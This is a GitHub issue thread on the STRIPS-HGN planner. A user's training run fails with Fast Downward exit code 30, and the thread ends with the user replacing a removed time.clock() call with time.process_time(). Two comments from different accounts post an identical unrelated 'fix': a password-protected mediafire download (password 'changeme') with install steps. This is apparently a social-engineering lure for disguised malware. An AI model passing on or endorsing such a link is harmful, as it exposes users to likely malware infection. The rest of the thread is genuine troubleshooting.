### ISSUE TITLE
exit code 30 from Fast Downward

### ISSUE THREAD

**Issue by 131231412313** [williamshen-nz/STRIPS-HGN#2]
**I am encountering an issue while using your STRIPS-HGN tool for training, and I would appreciate your assistance. The specific problem is as follows:

During the execution of the training script, I encountered an error, and the log indicates that the Fast Downward planner returned exit code 30. This code suggests a critical error occurred during the translation process in Fast Downward. The relevant stack trace from the log is as follows:

_**Traceback (most recent call last):
  File "train.py", line 175, in <module>
    train_wrapper(args=parse_and_validate_training_args())
  File "train.py", line 166, in train_wrapper
    wrap_method(
  File "/home/joyce/STRIPS-HGN/src/strips_hgn/utils/wrapper.py", line 70, in wrap_method
    raise exception
  File "/home/joyce/STRIPS-HGN/src/strips_hgn/utils/wrapper.py", line 52, in wrap_method
    wrapped_method(args, experiments_dir)
  File "/home/joyce/STRIPS-HGN/src/strips_hgn/utils/timer.py", line 67, in wrapped_timer
    return func(*args, **kwargs)
  File "train.py", line 77, in train_main
    ] = kfold_training_data_wf.run()
  File "/home/joyce/STRIPS-HGN/src/strips_hgn/utils/timer.py", line 67, in wrapped_timer
    return func(*args, **kwargs)
  File "/home/joyce/STRIPS-HGN/src/strips_hgn/workflows/k_fold_training_data.py", line 216, in run
    kfold_training_data = self._generate_kfold_training_data()
  File "/home/joyce/STRIPS-HGN/src/strips_hgn/utils/timer.py", line 67, in wrapped_timer
    return func(*args, **kwargs)
  File "/home/joyce/STRIPS-HGN/src/strips_hgn/workflows/k_fold_training_data.py", line 101, in _generate_kfold_training_data
    problem_to_state_value_pairs = generate_optimal_state_value_pairs(
  File "/home/joyce/STRIPS-HGN/src/strips_hgn/utils/timer.py", line 67, in wrapped_timer
    return func(*args, **kwargs)
  File "/home/joyce/STRIPS-HGN/src/strips_hgn/training_data/generate.py", line 114, in generate_optimal_state_value_pairs
    state_value_pairs = _generate_optimal_state_value_pairs_for_problem(
  File "/home/joyce/STRIPS-HGN/src/strips_hgn/training_data/generate.py", line 38, in _generate_optimal_state_value_pairs_for_problem
    optimal_plan: Optional[List[str]] = get_optimal_actions_using_fd(problem)
  File "/home/joyce/STRIPS-HGN/src/strips_hgn/planning/fast_downward_api.py", line 42, in get_optimal_actions_using_fd
    raise RuntimeError(
RuntimeError: Something went wrong, exit code 30 from Fast Downward (http://www.fast-downward.org/ExitCodes)**_

From my initial investigation, potential causes include:

    Issues with the Fast Downward configuration or version.
    Resource limitations during execution.

I have taken the following steps to resolve the issue:

    Ensured that Fast Downward is updated to the latest version and reinstalled.
    Tested with simplified problem instances.

Despite these efforts, the issue persists. Could you provide any additional guidance or potential solutions? Your assistance would be greatly appreciated.

Thank you for your time and support.**

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by williamshen-nz** [comment]
Hi,

Which PDDL flies are you trying? If they're not the ones in this repo, yhey should be valid and you should make sure you can run the normal version of Fast Downward on it.

Also please make sure you use our custom version of Fast Downward (forked from a long time ago): https://github.com/williamshen-nz/fast_downward

```
git clone https://github.com/williamshen-nz/fast_downward.git src/fast_downward
python src/fast_downward/build.py
```

**Comment by 131231412313** [comment]
I am training with PDDL file that I obtained from the benchmark of STRIPS-HGN. This file works fine when tested with the standard version of the FastDownward planner, but I am running into an error when attempting to train with STRIPS-HGN(using your custom version). Specifically, I received an error code 30 as same as the error above. Could you please help me understand what might be causing this issue and how I might resolve it? Your assistance would be greatly appreciated.

**Comment by williamshen-nz** [comment]
Can you please provide the command you ran so I can reproduce? Otherwise it is difficult to debug.

**Comment by 131231412313** [comment]
thank you for your answer, here are some details:

```
(base) joyce@JOYCE:~/STRIPS-HGN/src$ conda activate stripshgn
(stripshgn) joyce@JOYCE:~/STRIPS-HGN/src$ python train.py -d domain.pddl -p task01.pddl task02.pddl task03.pddl task04.pddl task05.pddl task06.pddl task07.pddl task08.pddl task09.pddl task10.pddl task11.pddl task12.pddl task13.pddl task14.pddl task15.pddl task16.pddl task17.pddl task18.pddl task19.pddl task20.pddl -t 100000
```

```
2024-09-01 17:30:43 strips_hgn.utils.logging_setup INFO     Writing logs to /home/joyce/STRIPS-HGN/results/train-strips-hgn-2024-09-01T17:30:43.343019/strips_hgn.log
2024-09-01 17:30:43 strips_hgn.utils.helpers INFO     Experiment results directory: /home/joyce/STRIPS-HGN/results/train-strips-hgn-2024-09-01T17:30:43.343019
2024-09-01 17:30:43 pyperplan.grounding INFO     Relevance analysis removed 0 facts
2024-09-01 17:30:43 pyperplan.grounding INFO     Relevance analysis removed 0 facts
2024-09-01 17:30:43 pyperplan.grounding INFO     Relevance analysis removed 0 facts
2024-09-01 17:30:43 pyperplan.grounding INFO     Relevance analysis removed 0 facts
2024-09-01 17:30:43 pyperplan.grounding INFO     Relevance analysis removed 0 facts
2024-09-01 17:30:43 pyperplan.grounding INFO     Relevance analysis removed 0 facts
2024-09-01 17:30:43 pyperplan.grounding INFO     Relevance analysis removed 0 facts
2024-09-01 17:30:43 pyperplan.grounding INFO     Relevance analysis removed 0 facts
2024-09-01 17:30:43 pyperplan.grounding INFO     Relevance analysis removed 0 facts
2024-09-01 17:30:43 pyperplan.grounding INFO     Relevance analysis removed 0 facts
2024-09-01 17:30:43 pyperplan.grounding INFO     Relevance analysis removed 0 facts
2024-09-01 17:30:43 pyperplan.grounding INFO     Relevance analysis removed 0 facts
2024-09-01 17:30:43 pyperplan.grounding INFO     Relevance analysis removed 0 facts
2024-09-01 17:30:43 pyperplan.grounding INFO     Relevance analysis removed 0 facts
2024-09-01 17:30:43 pyperplan.grounding INFO     Relevance analysis removed 0 facts
2024-09-01 17:30:43 pyperplan.grounding INFO     Relevance analysis removed 0 facts
2024-09-01 17:30:43 pyperplan.grounding INFO     Relevance analysis removed 0 facts
2024-09-01 17:30:43 pyperplan.grounding INFO     Relevance analysis removed 0 facts
2024-09-01 17:30:43 pyperplan.grounding INFO     Relevance analysis removed 0 facts
2024-09-01 17:30:43 pyperplan.grounding INFO     Relevance analysis removed 0 facts
2024-09-01 17:30:43 strips_hgn.planning.utils INFO     Generated 20 STRIPS Problems
2024-09-01 17:30:43 strips_hgn.utils.timer INFO     Timer GenerateSTRIPSProblemsTime stopped. Accumulated time: 0.0183s.
2024-09-01 17:30:43 strips_hgn.workflows.training_data INFO     Max number of EFF+ (receivers) = 3
2024-09-01 17:30:43 strips_hgn.workflows.training_data INFO     Max number of PREs (senders) = 3
2024-09-01 17:30:43 root         INFO     Running translator.
2024-09-01 17:30:43 root         INFO     translator stdin: None
2024-09-01 17:30:43 root         INFO     translator time limit: None
2024-09-01 17:30:43 root         INFO     translator memory limit: None
2024-09-01 17:30:43 root         INFO     translator command line string: /home/joyce/miniconda3/envs/stripshgn/bin/python /home/joyce/STRIPS-HGN/src/fast_downward/builds/release/bin/translate/translate.py domain.pddl task01.pddl --sas-file output.sas
Parsing...
Parsing: [0.000s CPU, 0.000s wall-clock]
Normalizing task... [0.000s CPU, 0.000s wall-clock]
Instantiating...
Generating Datalog program... [0.000s CPU, 0.000s wall-clock]
Normalizing Datalog program...
Normalizing Datalog program: [0.000s CPU, 0.001s wall-clock]
Preparing model... [0.010s CPU, 0.000s wall-clock]
Generated 21 rules.
Computing model... [0.000s CPU, 0.000s wall-clock]
53 relevant atoms
33 auxiliary atoms
86 final queue length
129 total queue pushes
Completing instantiation... [0.000s CPU, 0.000s wall-clock]
Instantiating: [0.010s CPU, 0.003s wall-clock]
Computing fact groups...
Finding invariants...
10 initial candidates
b'Traceback (most recent call last):\n  File "/home/joyce/STRIPS-HGN/src/fast_downward/builds/release/bin/translate/translate.py", line 734, in <module>\n    main()\n  File "/home/joyce/STRIPS-HGN/src/fast_downward/builds/release/bin/translate/translate.py", line 705, in main\n    sas_task = pddl_to_sas(task)\n  File "/home/joyce/STRIPS-HGN/src/fast_downward/builds/release/bin/translate/translate.py", line 547, in pddl_to_sas\n    groups, mutex_groups, translation_key = fact_groups.compute_groups(\n  File "/home/joyce/STRIPS-HGN/src/fast_downward/builds/release/bin/translate/fact_groups.py", line 110, in compute_groups\n    groups = invariant_finder.get_groups(task, reachable_action_params)\n  File "/home/joyce/STRIPS-HGN/src/fast_downward/builds/release/bin/translate/invariant_finder.py", line 132, in get_groups\n    invariants = sorted(find_invariants(task, reachable_action_params))\n  File "/home/joyce/STRIPS-HGN/src/fast_downward/builds/release/bin/translate/invariant_finder.py", line 100, in find_invariants\n    start_time = time.clock()\nAttributeError: module \'time\' has no attribute \'clock\'\n'
translate exit code: 30

Driver aborting after translate
2024-09-01 17:30:43 strips_hgn.utils.timer INFO     Timer KFoldTrainingDataWorkflow.GenerateTrainingDataTime stopped. Accumulated time: 0.04582s.
2024-09-01 17:30:43 strips_hgn.utils.timer INFO     Timer KFoldTrainingDataWorkflow.TotalTime stopped. Accumulated time: 0.046s.
2024-09-01 17:30:43 strips_hgn.utils.timer INFO     Timer TrainingDriverMethodTime stopped. Accumulated time: 0.06448s.
2024-09-01 17:30:43 strips_hgn.utils.wrapper ERROR    An unexpected error occurred.
Traceback (most recent call last):
  File "/home/joyce/STRIPS-HGN/src/strips_hgn/utils/wrapper.py", line 52, in wrap_method
    wrapped_method(args, experiments_dir)
  File "/home/joyce/STRIPS-HGN/src/strips_hgn/utils/timer.py", line 67, in wrapped_timer
    return func(*args, **kwargs)
  File "train.py", line 77, in train_main
    ] = kfold_training_data_wf.run()
  File "/home/joyce/STRIPS-HGN/src/strips_hgn/utils/timer.py", line 67, in wrapped_timer
    return func(*args, **kwargs)
  File "/home/joyce/STRIPS-HGN/src/strips_hgn/workflows/k_fold_training_data.py", line 216, in run
    kfold_training_data = self._generate_kfold_training_data()
  File "/home/joyce/STRIPS-HGN/src/strips_hgn/utils/timer.py", line 67, in wrapped_timer
    return func(*args, **kwargs)
  File "/home/joyce/STRIPS-HGN/src/strips_hgn/workflows/k_fold_training_data.py", line 101, in _generate_kfold_training_data
    problem_to_state_value_pairs = generate_optimal_state_value_pairs(
  File "/home/joyce/STRIPS-HGN/src/strips_hgn/utils/timer.py", line 67, in wrapped_timer
    return func(*args, **kwargs)
  File "/home/joyce/STRIPS-HGN/src/strips_hgn/training_data/generate.py", line 114, in generate_optimal_state_value_pairs
    state_value_pairs = _generate_optimal_state_value_pairs_for_problem(
  File "/home/joyce/STRIPS-HGN/src/strips_hgn/training_data/generate.py", line 38, in _generate_optimal_state_value_pairs_for_problem
    optimal_plan: Optional[List[str]] = get_optimal_actions_using_fd(problem)
  File "/home/joyce/STRIPS-HGN/src/strips_hgn/planning/fast_downward_api.py", line 42, in get_optimal_actions_using_fd
    raise RuntimeError(
RuntimeError: Something went wrong, exit code 30 from Fast Downward (http://www.fast-downward.org/ExitCodes)
2024-09-01 17:30:43 strips_hgn.utils.metrics INFO     Saved MetricsLogger JSON to /home/joyce/STRIPS-HGN/results/train-strips-hgn-2024-09-01T17:30:43.343019/train_metrics.json
Check /home/joyce/STRIPS-HGN/results/train-strips-hgn-2024-09-01T17:30:43.343019/strips_hgn.log if error traceback is not listed
Traceback (most recent call last):
  File "train.py", line 175, in <module>
    train_wrapper(args=parse_and_validate_training_args())
  File "train.py", line 166, in train_wrapper
    wrap_method(
  File "/home/joyce/STRIPS-HGN/src/strips_hgn/utils/wrapper.py", line 70, in wrap_method
    raise exception
  File "/home/joyce/STRIPS-HGN/src/strips_hgn/utils/wrapper.py", line 52, in wrap_method
    wrapped_method(args, experiments_dir)
  File "/home/joyce/STRIPS-HGN/src/strips_hgn/utils/timer.py", line 67, in wrapped_timer
    return func(*args, **kwargs)
  File "train.py", line 77, in train_main
    ] = kfold_training_data_wf.run()
  File "/home/joyce/STRIPS-HGN/src/strips_hgn/utils/timer.py", line 67, in wrapped_timer
    return func(*args, **kwargs)
  File "/home/joyce/STRIPS-HGN/src/strips_hgn/workflows/k_fold_training_data.py", line 216, in run
    kfold_training_data = self._generate_kfold_training_data()
  File "/home/joyce/STRIPS-HGN/src/strips_hgn/utils/timer.py", line 67, in wrapped_timer
    return func(*args, **kwargs)
  File "/home/joyce/STRIPS-HGN/src/strips_hgn/workflows/k_fold_training_data.py", line 101, in _generate_kfold_training_data
    problem_to_state_value_pairs = generate_optimal_state_value_pairs(
  File "/home/joyce/STRIPS-HGN/src/strips_hgn/utils/timer.py", line 67, in wrapped_timer
    return func(*args, **kwargs)
  File "/home/joyce/STRIPS-HGN/src/strips_hgn/training_data/generate.py", line 114, in generate_optimal_state_value_pairs
    state_value_pairs = _generate_optimal_state_value_pairs_for_problem(
  File "/home/joyce/STRIPS-HGN/src/strips_hgn/training_data/generate.py", line 38, in _generate_optimal_state_value_pairs_for_problem
    optimal_plan: Optional[List[str]] = get_optimal_actions_using_fd(problem)
  File "/home/joyce/STRIPS-HGN/src/strips_hgn/planning/fast_downward_api.py", line 42, in get_optimal_actions_using_fd
    raise RuntimeError(
RuntimeError: Something went wrong, exit code 30 from Fast Downward (http://www.fast-downward.org/ExitCodes)
```

![截图 2024-09-01 17-34-57](https://github.com/user-attachments/assets/6f301ebf-def6-4436-b663-e31f03c5c72b)

thank you again！

**Comment by williamshen-nz** [comment]
Thanks for the info. I'm not sure which domain and task PDDL files you are using so it is difficult to determine what is happening. All the benchmark problems were working when I tested them a few years ago.

You should make sure you can run the scripts in the `experiments` folder. If they don't work, it might be a platform specific issue. You may need to modify a working version of Fast Downward to output plans, like how I did in the first place. You can do this in the STRIPS-HGN repo around here: https://github.com/williamshen-nz/STRIPS-HGN/blob/master/src/strips_hgn/planning/fast_downward_api.py#L48

**Comment by 131231412313** [comment]
I wanted to let you know that the issue has been resolved. I modified the find_invariants function in invariant_finder.py to replace time.clock() with time.process_time(), which fixed the problem.

Thank you so much for your guidance and support. Your suggestions were instrumental in resolving the issue, and I greatly appreciate your assistance. I also want to express my support and admiration for your research work！
